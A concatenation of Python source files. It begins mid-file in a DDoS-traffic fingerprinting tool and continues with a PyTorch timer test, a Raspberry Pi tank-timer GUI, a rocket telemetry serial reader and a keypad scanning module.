logger.debug("multivector attack with fragmentation - one fingerprint")
logger.debug("1 fingerprint found, but it was expected more than 1, since it is a fragmentation attack")
# add fragmentation dataframe because a fragmentation attack was detected
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
# add fragmentation IPs to the evaluation dataframe
df_all = pd.concat([df_frag,df_fingerprint])
return (df_all)
# No fragmentation
else:
logger.debug("multivector attack with NO fragmentation - one fingerprint")
return (df_fingerprint)
# more than 1 fingerprint was found
else:
# more than 1 fingerprint and they are related to fragmentation attack
df_attack_vector_combined = pd.DataFrame()
# get dataframe per fingerprint and combine it
for attack_vector_fingerprint in fingerprints:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,attack_vector_fingerprint)
df_attack_vector_combined = pd.concat([df_attack_vector_combined,df_fingerprint])
# add fragmentation dataframe to the filtered one
if fragmentation_attack_flag:
logger.debug("multivector attack with fragmentation - 1+ fingerprints")
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
df_attack_vector_combined = pd.concat([df_frag,df_attack_vector_combined])
# more than 1 fingerprint and they are NOT related to fragmentation attack
else:
logger.debug("multivector attack with NO fragmentation - 1+ fingerprints")
return (df_attack_vector_combined)
###############################################################################
### Main Process
if __name__ == '__main__':
logo()
signal.signal(signal.SIGINT, signal_handler)
parser = parser_add_arguments()
args = parser.parse_args()
logger = logger(args)
config = import_logfile(args)
if (args.version):
print ("version: {}".format(version))
sys.exit(0)
if (args.status):
check_repository(config)
if (not args.filename):
parser.print_help()
sys.exit(IOError("\nInput file not provided. Use '-f' for that."))
if (not os.path.exists(args.filename)):
logger.error(IOError("File " + args.filename + " is not readble"))
sys.exit(IOError("File " + args.filename + " is not readble"))
# load network file
n_type,df = load_file(args)
if not isinstance(df, pd.DataFrame):
logger.error("could not convert input file <{}>".format(args.filename))
sys.exit(1)
# checking if the provided file could be converted to dataframe
if (len(df)<2):
logger.error("could not read data from file <{}>".format(args.filename))
sys.exit(1)
##
## DETECT TARGET
##
# usually there is only one target, but anycast/load-balanced setups may have more
(target_ip_list,df) = infer_target_ip(df,n_type)
try:
target_ip = target_ip_list[0]
except:
print ("Target IP could not be infered.")
sys.exit(0)
# build filter for victim IP
msg = "Processing target IP address: {}".format(target_ip)
df_target = df[df['ip_dst'] == target_ip]
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug(msg)
##
## IDENTIFY ATTACK VECTORS (PROTOCOL)
##
(lst_attack_protocols, fragmentation_attack_flag) = infer_protocol_attack(df_target,n_type)
multi_vector_attack_flag = False
# more than one protocol as outliers
if (len(lst_attack_protocols)>1):
multi_vector_attack_flag = True
logger.info("Multi-vector attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
else:
logger.info("Single attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
##
## IDENTIFY FINGERPRINTS
##
fingerprints = []
# fingerprint per attack vector
for protocol in lst_attack_protocols:
# filter database based on protocol and target
df_attack_vector = df[(df['ip_dst'] == target_ip) & (df['highest_protocol'] == protocol)]
fingerprint = build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag)
# get src_ips per attack vector
src_ips = []
src_ips.append(fingerprint)
df_src_ips = evaluate_fingerprint_ratio(df,src_ips,fragmentation_attack_flag)
fingerprint.update( {"src_ips": df_src_ips['ip_src'].unique().tolist()})
# generate key for this attack vector
sha256 = hashlib.sha256(str(fingerprint).encode()).hexdigest()
fingerprint.update( {"attack_vector_key": sha256} )
fingerprints.append(fingerprint)
##
## FINGERPRINT EVALUATION
##
df_filtered = evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag)
# infer tags based on the generated fingerprint
labels = add_label(fingerprints,df_filtered)
# add extra fields/stats and save file locally
(enriched_fingerprint,json_file) = prepare_fingerprint_upload(df_filtered,df,fingerprints,n_type,labels,args.fingerprint_dir)
# show summarized fingerprint
print_fingerprint(enriched_fingerprint)
# print matching ratio
if (args.summary): evaluate_fingerprint(df,df_filtered,enriched_fingerprint)
# generate graphic file (dot)
if (args.graph): generate_dot_file(df_filtered, df)
print ("Fingerprint saved on {}".format(json_file))
if (args.upload):
(user,passw,host) = get_repository(args,config)
# upload to the repository
ret = upload(enriched_fingerprint, json_file, user, passw, host, enriched_fingerprint.get("key"))
sys.exit(0)
#EOF
|
local_timer_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import signal
import time
import unittest
import unittest.mock as mock
import torch.distributed.elastic.timer as timer
from torch.distributed.elastic.timer.api import TimerRequest
from torch.distributed.elastic.timer.local_timer import MultiprocessingRequestQueue
from torch.testing._internal.common_utils import (
TEST_WITH_TSAN,
run_tests,
IS_WINDOWS,
IS_MACOS,
sandcastle_skip_if,
)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS):
class LocalTimerTest(unittest.TestCase):
def setUp(self):
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
self.server.start()
def tearDown(self):
self.server.stop()
def test_exception_propagation(self):
with self.assertRaises(Exception, msg="foobar"):
with timer.expires(after=1):
raise Exception("foobar")
def test_no_client(self):
# no timer client configured; exception expected
timer.configure(None)
with self.assertRaises(RuntimeError):
with timer.expires(after=1):
pass
def test_client_interaction(self):
# no timer client configured but one passed in explicitly
# no exception expected
timer_client = timer.LocalTimerClient(self.mp_queue)
timer_client.acquire = mock.MagicMock(wraps=timer_client.acquire)
timer_client.release = mock.MagicMock(wraps=timer_client.release)
with timer.expires(after=1, scope="test", client=timer_client):
pass
timer_client.acquire.assert_called_once_with("test", mock.ANY)
timer_client.release.assert_called_once_with("test")
def test_happy_path(self):
timer.configure(timer.LocalTimerClient(self.mp_queue))
with timer.expires(after=0.5):
time.sleep(0.1)
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
def test_get_timer_recursive(self):
"""
If a function acquires a countdown timer with default scope,
then recursive calls to the function should re-acquire the
timer rather than creating a new one. That is, only the last
recursive call's timer will take effect.
"""
self.server.start()
timer.configure(timer.LocalTimerClient(self.mp_queue))
# func should not time out
def func(n):
if n > 0:
with timer.expires(after=0.1):
func(n - 1)
time.sleep(0.05)
func(4)
# func2 should time out
def func2(n):
if n > 0:
with timer.expires(after=0.1):
func2(n - 1)
time.sleep(0.2)
p = mp.Process(target=func2, args=(2,))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
@staticmethod
def _run(mp_queue, timeout, duration):
client = timer.LocalTimerClient(mp_queue)
timer.configure(client)
with timer.expires(after=timeout):
time.sleep(duration)
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
def test_timer(self):
timeout = 0.1
duration = 1
p = mp.Process(target=self._run, args=(self.mp_queue, timeout, duration))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
def _enqueue_on_interval(mp_queue, n, interval, sem):
"""
Enqueues ``n`` timer requests into ``mp_queue``, one element every
``interval`` seconds. Releases the given semaphore once before going to work.
"""
sem.release()
for i in range(0, n):
mp_queue.put(TimerRequest(i, "test_scope", 0))
time.sleep(interval)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS):
class MultiprocessingRequestQueueTest(unittest.TestCase):
def test_get(self):
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
requests = request_queue.get(1, timeout=0.01)
self.assertEqual(0, len(requests))
request = TimerRequest(1, "test_scope", 0)
mp_queue.put(request)
requests = request_queue.get(2, timeout=0.01)
self.assertEqual(1, len(requests))
self.assertIn(request, requests)
def test_get_size(self):
"""
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=n*interval+delta)``
yields all ``n`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(target=_enqueue_on_interval, args=(mp_queue, n, interval, sem))
p.start()
sem.acquire() # blocks until the process has started to run the function
timeout = interval * (n + 1)
start = time.time()
requests = request_queue.get(n, timeout=timeout)
self.assertLessEqual(time.time() - start, timeout + interval)
self.assertEqual(n, len(requests))
def test_get_less_than_size(self):
"""
Tests slow producer.
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=(interval * n/2))``
yields at most ``n/2`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(target=_enqueue_on_interval, args=(mp_queue, n, interval, sem))
p.start()
sem.acquire() # blocks until the process has started to run the function
requests = request_queue.get(n, timeout=(interval * (n / 2)))
self.assertLessEqual(n / 2, len(requests))
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS):
class LocalTimerServerTest(unittest.TestCase):
def setUp(self):
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
def tearDown(self):
self.server.stop()
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
def test_watchdog_call_count(self):
"""
checks that the watchdog function ran wait/interval +- 1 times
"""
self.server._run_watchdog = mock.MagicMock(wraps=self.server._run_watchdog)
wait = 0.1
self.server.start()
time.sleep(wait)
self.server.stop()
watchdog_call_count = self.server._run_watchdog.call_count
self.assertGreaterEqual(watchdog_call_count, int(wait / self.max_interval) - 1)
self.assertLessEqual(watchdog_call_count, int(wait / self.max_interval) + 1)
def test_watchdog_empty_queue(self):
"""
checks that the watchdog can run on an empty queue
"""
self.server._run_watchdog()
def _expired_timer(self, pid, scope):
expired = time.time() - 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=expired)
def _valid_timer(self, pid, scope):
valid = time.time() + 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=valid)
def _release_timer(self, pid, scope):
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=-1)
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
@mock.patch("os.kill")
def test_expired_timers(self, mock_os_kill):
"""
tests that a single expired timer on a process should terminate
the process and clean up all pending timers that were owned by the process
"""
test_pid = -3
self.mp_queue.put(self._expired_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_called_once_with(test_pid, signal.SIGKILL)
@mock.patch("os.kill")
def test_acquire_release(self, mock_os_kill):
"""
tests that:
1. a timer can be acquired then released (should not terminate process)
2. a timer can be vacuously released (e.g. no-op)
"""
test_pid = -3
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_not_called()
@mock.patch("os.kill")
def test_valid_timers(self, mock_os_kill):
"""
tests that valid timers are processed correctly and the process is left alone
"""
self.mp_queue.put(self._valid_timer(pid=-3, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-3, scope="test2"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test2"))
self.server._run_watchdog()
self.assertEqual(4, len(self.server._timers))
self.assertTrue((-3, "test1") in self.server._timers)
self.assertTrue((-3, "test2") in self.server._timers)
self.assertTrue((-2, "test1") in self.server._timers)
self.assertTrue((-2, "test2") in self.server._timers)
mock_os_kill.assert_not_called()
if __name__ == "__main__":
run_tests()
|
tanksimulatortest4.py
|
import tkinter as tk
from tkinter import *
#import pygame
import time
import tkinter.messagebox
import threading
import RPi.GPIO as GPIO
root=Tk()
root.title("Tank Simulator")
root.configure(bg="powder blue")
#root.resizable(width=True,height=True)
root.geometry("1920x1080")
GPIO.setmode(GPIO.BOARD)
GPIO.setup(40,GPIO.IN)
GPIO.setup(38,GPIO.IN)
GPIO.setup(37,GPIO.IN)
GPIO.setup(36,GPIO.IN)
GPIO.setup(35,GPIO.IN)
GPIO.setup(33,GPIO.IN)
GPIO.setup(32,GPIO.IN)
GPIO.setup(31,GPIO.IN)
GPIO.setup(29,GPIO.IN)
GPIO.setup(16,GPIO.IN)
GPIO.setup(15,GPIO.IN)
#pygame.mixer.init()
#def play():
#pygame.mixer.music.load(
def entrybox(l1,l2,l3,m1,min):
sec = StringVar()
Entry(root, textvariable=sec, width = 3,justify='center',font = 'Helvetica 14').place(width=30,height=40,x=l1, y=m1)
sec.set('00')
mins= StringVar()
Entry(root, textvariable=mins, width = 3,justify='center',font = 'Helvetica 14').place(width=30,height=40,x=l2, y=m1)
mins.set(min)
hrs = StringVar()
Entry(root, textvariable=hrs, width = 3,justify='center',font = 'Helvetica 14').place(width=30,height=40,x=l3, y=m1)
hrs.set('00')
time=[hrs,mins,sec]
return time
e1=entrybox(80,50,20,120,15)
e2=entrybox(220,190,160,120,10)
e3=entrybox(360,330,300,120,5)
e4=entrybox(500,470,440,120,5)
e5=entrybox(640,610,580,120,5)
e6=entrybox(780,750,720,120,5)
e7=entrybox(80,50,20,500,5)
e8=entrybox(220,190,160,500,10)
e9=entrybox(360,330,300,500,5)
e10=entrybox(500,470,440,500,5)
e11=entrybox(640,610,580,500,5)
calc = Frame(root)
calc.grid()
# label_1=Label(root,width=20,height=2,font=('arial',30,'bold'),bd=4,text="Scientific Calculator",justify=CENTER).grid(row=0,column=4,columnspan=5)
#lab1 = Label(Fr1, text="Tank_1", bg="Yellow", width=8,fg="Black", font=("none", 30, "bold"))grid(row=1,column=0,padx=10)
t1 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_1"))
t1.grid(row=1,column=1,padx=10)
t2 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_2"))
t2.grid(row=1,column=2,padx=10)
t3 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_3"))
t3.grid(row=1,column=3,padx=10)
t4 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_4"))
t4.grid(row=1,column=4,padx=10)
t5 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_5"))
t5.grid(row=1,column=5,padx=10)
t6 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_6"))
t6.grid(row=1,column=6,padx=10)
t7 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_7"))
t7.grid(row=2,column=1,pady=300)
t8 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_8"))
t8.grid(row=2,column=2,pady=300)
t9= Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_9"))
t9.grid(row=2,column=3,pady=300)
t10 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_10"))
t10.grid(row=2,column=4,pady=300)
t11 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_11"))
t11.grid(row=2,column=5,pady=300)
#tankName = ["Tank_1","Tank_2","Tank_3","Tank_4","Tank_5"]
#tankLabel = []
#for tnum, tname in enumerate(tankName):
#label = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_"+str(tnum+1))).grid(row=1,column=tnum,padx=10)
#if (tname=="Tank_1"):
#tankLabel.append(label)
#print(tankLabel)
#Create Entry Widgets for HH MM SS
# sec = StringVar()
# Entry(win, textvariable=sec, width = 2, font = 'Helvetica 14').place(x=220, y=120)
# sec.set('00')
# mins= StringVar()
# Entry(win, textvariable = mins, width =2, font = 'Helvetica
# 14').place(x=180, y=120)
# mins.set('00')
# hrs= StringVar()
# Entry(win, textvariable = hrs, width =2, font = 'Helvetica 14').place(x=142, y=120)
# hrs.set('00')
# #Define the function for the timer
def countdowntimer(hrs,mins,sec):
times = int(hrs.get())*3600+ int(mins.get())*60 + int(sec.get())
while times > -1:
minute,second = (times // 60 , times % 60)
hour =0
if minute >= 60:
hour , minute = (minute // 60 , minute % 60)
sec.set(second)
mins.set(minute)
hrs.set(hour)
#Update the time
root.update()
time.sleep(1)
if(times == 0):
sec.set('00')
mins.set('15')
hrs.set('00')
times -= 1
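# Illustrative helper (not used by the GUI above): the same seconds-to-H/M/S
# breakdown that countdowntimer performs, written as a pure function for clarity.
def split_seconds_example(total_seconds):
    # divmod returns quotient and remainder in one step
    hours, remainder = divmod(total_seconds, 3600)
    minutes, seconds = divmod(remainder, 60)
    return hours, minutes, seconds
# e.g. split_seconds_example(904) == (0, 15, 4)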
def gogreen(t):
print("here")
t.config(bg="#00ff00")
def checkloop(t,pin,e1,e2,e3):
b=False
while True:
if GPIO.input(pin) == 1:
if b== False :
gogreen(t)
#labelText.set("on")
print ("on")
countdowntimer(e1,e2,e3)
b = True
else:
# labelText.set("off")
print ("off")
b = False
while GPIO.input(pin) == 1: pass
Startbutton = Button(root, text='START_1', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t1),threading.Thread(target=countdowntimer, args=(e1[0],e1[1],e1[2])).start()]).place(x=20, y=180)
Startbutton2 = Button(root, text='START_2', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t2),threading.Thread(target=countdowntimer, args=(e2[0],e2[1],e2[2])).start()]).place(x=160, y=180)
Startbutton3 = Button(root, text='START_3', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t3),threading.Thread(target=countdowntimer, args=(e3[0],e3[1],e3[2])).start()]).place(x=300, y=180)
Startbutton4 = Button(root, text='START_4', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t4),threading.Thread(target=countdowntimer, args=(e4[0],e4[1],e4[2])).start()]).place(x=440, y=180)
Startbutton5 = Button(root, text='START_5', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t5),threading.Thread(target=countdowntimer, args=(e5[0],e5[1],e5[2])).start()]).place(x=580, y=180)
Startbutton6 = Button(root, text='START_6', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t6),threading.Thread(target=countdowntimer, args=(e6[0],e6[1],e6[2])).start()]).place(x=720, y=180)
Startbutton7 = Button(root, text='START_7', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t7),threading.Thread(target=countdowntimer, args=(e7[0],e7[1],e7[2])).start()]).place(x=20, y=560)
Startbutton8 = Button(root, text='START_8', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t8),threading.Thread(target=countdowntimer, args=(e8[0],e8[1],e8[2])).start()]).place(x=160, y=560)
Startbutton9 = Button(root, text='START_9', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t9),threading.Thread(target=countdowntimer, args=(e9[0],e9[1],e9[2])).start()]).place(x=300, y=560)
Startbutton10 = Button(root, text='START_10', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t10),threading.Thread(target=countdowntimer, args=(e10[0],e10[1],e10[2])).start()]).place(x=440, y=560)
Startbutton11 = Button(root, text='START_11', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t11),threading.Thread(target=countdowntimer, args=(e11[0],e11[1],e11[2])).start()]).place(x=580, y=560)
Exitbutton = Button(root, text="Exit",bg="red", command=root.destroy).place(x=1750, y=0)
threading.Thread(target=checkloop,args=(t1,40,e1[0],e1[1],e1[2])).start()
threading.Thread(target=checkloop,args=(t2,38,e2[0],e2[1],e2[2])).start()
threading.Thread(target=checkloop,args=(t3,37,e3[0],e3[1],e3[2])).start()
threading.Thread(target=checkloop,args=(t4,36,e4[0],e4[1],e4[2])).start()
threading.Thread(target=checkloop,args=(t5,35,e5[0],e5[1],e5[2])).start()
threading.Thread(target=checkloop,args=(t6,33,e6[0],e6[1],e6[2])).start()
threading.Thread(target=checkloop,args=(t7,32,e7[0],e7[1],e7[2])).start()
threading.Thread(target=checkloop,args=(t8,31,e8[0],e8[1],e8[2])).start()
threading.Thread(target=checkloop,args=(t9,29,e9[0],e9[1],e9[2])).start()
threading.Thread(target=checkloop,args=(t10,16,e10[0],e10[1],e10[2])).start()
threading.Thread(target=checkloop,args=(t11,15,e11[0],e11[1],e11[2])).start()
#pack
#t1.pack()
#t2.pack()
#t3.pack()
#Startbutton.pack()
# win.mainloop()
#========================================================================================================================================#
# def App():
# Win_App=Tk()
# Win_App.title("Life Apps Calculator")
# Win_App.configure(bg="Orange")
# Win_App.resizable(width=False,height=False)
# Win_App.geometry("450x580")
# life_inter = Frame(Win_App)
# life=('BMI','AGE','Discount','Percent','Date','Length','Area','Volume','currency','Per-Loan','Split-Bill','GST')
# i=0
# life_btn=[]
# for j in range(1,5):
# for k in range(3):
# life_btn.append(Button(Win_App,width=8,height=3,font=('arial',20,'bold'),bd=4,text=life[i]))
# life_btn[i].grid(row=j,column=k,pady=2)
# i+=1
# =========================================================================================================================================#
# menubar=Menu(root)
# root.configure(menu=menubar)
root.mainloop()
|
serial_data_producer.py
|
import glob
import struct
import sys
import threading
import serial
from src.data_producer import DataProducer
from src.realtime.checksum_validator import ChecksumValidator
from src.rocket_packet.rocket_packet_parser import RocketPacketParser
from src.rocket_packet.rocket_packet_repository import RocketPacketRepository
class NoConnectedDeviceException(Exception):
"""Raised when data acquisition is started with no device connected"""
class SerialDataProducer(DataProducer):
def __init__(self, lock: threading.Lock, rocket_packet_repository: RocketPacketRepository,
rocket_packet_parser: RocketPacketParser, checksum_validator: ChecksumValidator, baudrate=9600,
start_character=b's', sampling_frequency=1.0):
super().__init__(lock)
self.rocket_packet_repository = rocket_packet_repository
self.rocket_packet_parser = rocket_packet_parser
self.checksum_validator = checksum_validator
self.unsaved_data = False
self.port = serial.Serial()
self.port.baudrate = baudrate
self.port.timeout = 1 / sampling_frequency
self.start_character = start_character
# RocketPacket data + 1 byte for checksum
self.num_bytes_to_read = self.rocket_packet_parser.get_number_of_bytes() + 1
def start(self):
ports = self.detect_serial_ports()
if not ports:
raise NoConnectedDeviceException("Aucun récepteur connecté")
self.port.port = ports[0]
self.port.open()
self.is_running = True
self.thread = threading.Thread(target=self.run)
self.thread.start()
def run(self):
while self.is_running:
c = self.port.read(1)
if c == self.start_character:
data_bytes = self.port.read(self.num_bytes_to_read)
if self.checksum_validator.validate(data_bytes):
try:
rocket_packet = self.rocket_packet_parser.parse(data_bytes[:-1])
self.add_rocket_packet(rocket_packet)
self.unsaved_data = True
except struct.error as e:
"""
This error can occur if we don't read enough bytes on the serial port or if the packet format is
incorrect.
"""
print("Invalid packet: " + str(e))
self.port.close()
def save(self, filename: str):
self.rocket_packet_repository.save(filename, self.available_rocket_packets, self.rocket_packet_parser)
self.unsaved_data = False
def has_unsaved_data(self):
return self.unsaved_data
def clear_rocket_packets(self):
self.lock.acquire()
self.available_rocket_packets.clear()
self.unsaved_data = False
self.lock.release()
@staticmethod
def detect_serial_ports():
""" Lists serial port names
:raises EnvironmentError
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
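# Illustrative sketch only: the real ChecksumValidator is imported from
# src.realtime.checksum_validator and its algorithm is not shown in this file.
# The hypothetical validator below assumes the last byte is the modulo-256 sum
# of the payload bytes, just to make the framing handled in run() concrete.
class _ExampleChecksumValidator:
    def validate(self, data_bytes: bytes) -> bool:
        # expect at least one payload byte plus the trailing checksum byte
        if len(data_bytes) < 2:
            return False
        payload, checksum = data_bytes[:-1], data_bytes[-1]
        return sum(payload) % 256 == checksum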
|
keypad.py
|
"""
`keypad` - Support for scanning keys and key matrices
===========================================================
See `CircuitPython:keypad` in CircuitPython for more details.
* Author(s): Melissa LeBlanc-Williams
"""
import time
import threading
from collections import deque
import digitalio
class Event:
"""A key transition event."""
def __init__(self, key_number=0, pressed=True):
"""
Create a key transition event, which reports a key-pressed or key-released transition.
:param int key_number: the key number
:param bool pressed: ``True`` if the key was pressed; ``False`` if it was released.
"""
self._key_number = key_number
self._pressed = pressed
@property
def key_number(self):
"""The key number."""
return self._key_number
@property
def pressed(self):
"""
``True`` if the event represents a key down (pressed) transition.
The opposite of `released`.
"""
return self._pressed
@property
def released(self):
"""
``True`` if the event represents a key up (released) transition.
The opposite of `pressed`.
"""
return not self._pressed
def __eq__(self, other):
"""
Two `Event` objects are equal if their `key_number`
and `pressed`/`released` values are equal.
"""
return self.key_number == other.key_number and self.pressed == other.pressed
def __hash__(self):
"""Returns a hash for the `Event`, so it can be used in dictionaries, etc.."""
return hash(self._key_number)
def __repr__(self):
"""Return a textual representation of the object"""
return "<Event: key_number {} {}>".format(
self.key_number, "pressed" if self._pressed else "released"
)
class _EventQueue:
"""
A queue of `Event` objects, filled by a `keypad` scanner such as `Keys` or `KeyMatrix`.
You cannot create an instance of `_EventQueue` directly. Each scanner creates an
instance when it is created.
"""
def __init__(self, max_events):
self._events = deque([], max_events)
self._overflowed = False
def get(self):
"""
Return the next key transition event. Return ``None`` if no events are pending.
Note that the queue size is limited; see ``max_events`` in the constructor of
a scanner such as `Keys` or `KeyMatrix`.
If a new event arrives when the queue is full, the event is discarded, and
`overflowed` is set to ``True``.
:return: the next queued key transition `Event`
:rtype: Optional[Event]
"""
if not self._events:
return None
return self._events.popleft()
def get_into(self, event):
"""Store the next key transition event in the supplied event, if available,
and return ``True``.
If there are no queued events, do not touch ``event`` and return ``False``.
The advantage of this method over ``get()`` is that it does not allocate storage.
Instead you can reuse an existing ``Event`` object.
Note that the queue size is limited; see ``max_events`` in the constructor of
a scanner such as `Keys` or `KeyMatrix`.
:return: ``True`` if an event was available and stored, ``False`` if not.
:rtype: bool
"""
if not self._events:
return False
next_event = self._events.popleft()
# pylint: disable=protected-access
event._key_number = next_event._key_number
event._pressed = next_event._pressed
# pylint: enable=protected-access
return True
def clear(self):
"""
Clear any queued key transition events. Also sets `overflowed` to ``False``.
"""
self._events.clear()
self._overflowed = False
def __bool__(self):
"""``True`` if `len()` is greater than zero.
This is an easy way to check if the queue is empty.
"""
return len(self._events) > 0
def __len__(self):
"""Return the number of events currently in the queue. Used to implement ``len()``."""
return len(self._events)
@property
def overflowed(self):
"""
``True`` if an event could not be added to the event queue because it was full. (read-only)
Set to ``False`` by `clear()`.
"""
return self._overflowed
def keypad_eventqueue_record(self, key_number, current):
"""Record a new event"""
if len(self._events) == self._events.maxlen:
self._overflowed = True
else:
self._events.append(Event(key_number, current))
class _KeysBase:
def __init__(self, interval, max_events, scanning_function):
self._interval = interval
self._last_scan = time.monotonic()
self._events = _EventQueue(max_events)
self._scanning_function = scanning_function
self._scan_thread = threading.Thread(target=self._scanning_loop, daemon=True)
self._scan_thread.start()
@property
def events(self):
"""The EventQueue associated with this Keys object. (read-only)"""
return self._events
def deinit(self):
"""Stop scanning"""
if self._scan_thread.is_alive():
self._scan_thread.join()
def __enter__(self):
"""No-op used by Context Managers."""
return self
def __exit__(self, exception_type, exception_value, traceback):
"""
Automatically deinitializes when exiting a context. See
:ref:`lifetime-and-contextmanagers` for more info.
"""
self.deinit()
def _scanning_loop(self):
while True:
remaining_delay = self._interval - (time.monotonic() - self._last_scan)
if remaining_delay > 0:
time.sleep(remaining_delay)
self._last_scan = time.monotonic()
self._scanning_function()
class Keys(_KeysBase):
"""Manage a set of independent keys."""
def __init__(
self, pins, *, value_when_pressed, pull=True, interval=0.02, max_events=64
):
"""
Create a `Keys` object that will scan keys attached to the given sequence of pins.
Each key is independent and attached to its own pin.
An `EventQueue` is created when this object is created and is available in the
`events` attribute.
:param Sequence[microcontroller.Pin] pins: The pins attached to the keys.
The key numbers correspond to indices into this sequence.
:param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
``False`` if the pin reads low (is grounded) when the key is pressed.
All the pins must be connected in the same way.
:param bool pull: ``True`` if an internal pull-up or pull-down should be
enabled on each pin. A pull-up will be used if ``value_when_pressed`` is ``False``;
a pull-down will be used if it is ``True``.
If an external pull is already provided for all the pins, you can set
``pull`` to ``False``.
However, enabling an internal pull when an external one is already present is not
a problem;
it simply uses slightly more current.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
self._digitalinouts = []
for pin in pins:
dio = digitalio.DigitalInOut(pin)
if pull:
dio.pull = (
digitalio.Pull.DOWN if value_when_pressed else digitalio.Pull.UP
)
self._digitalinouts.append(dio)
self._currently_pressed = [False] * len(pins)
self._previously_pressed = [False] * len(pins)
self._value_when_pressed = value_when_pressed
super().__init__(interval, max_events, self._keypad_keys_scan)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
for dio in self._digitalinouts:
dio.deinit()
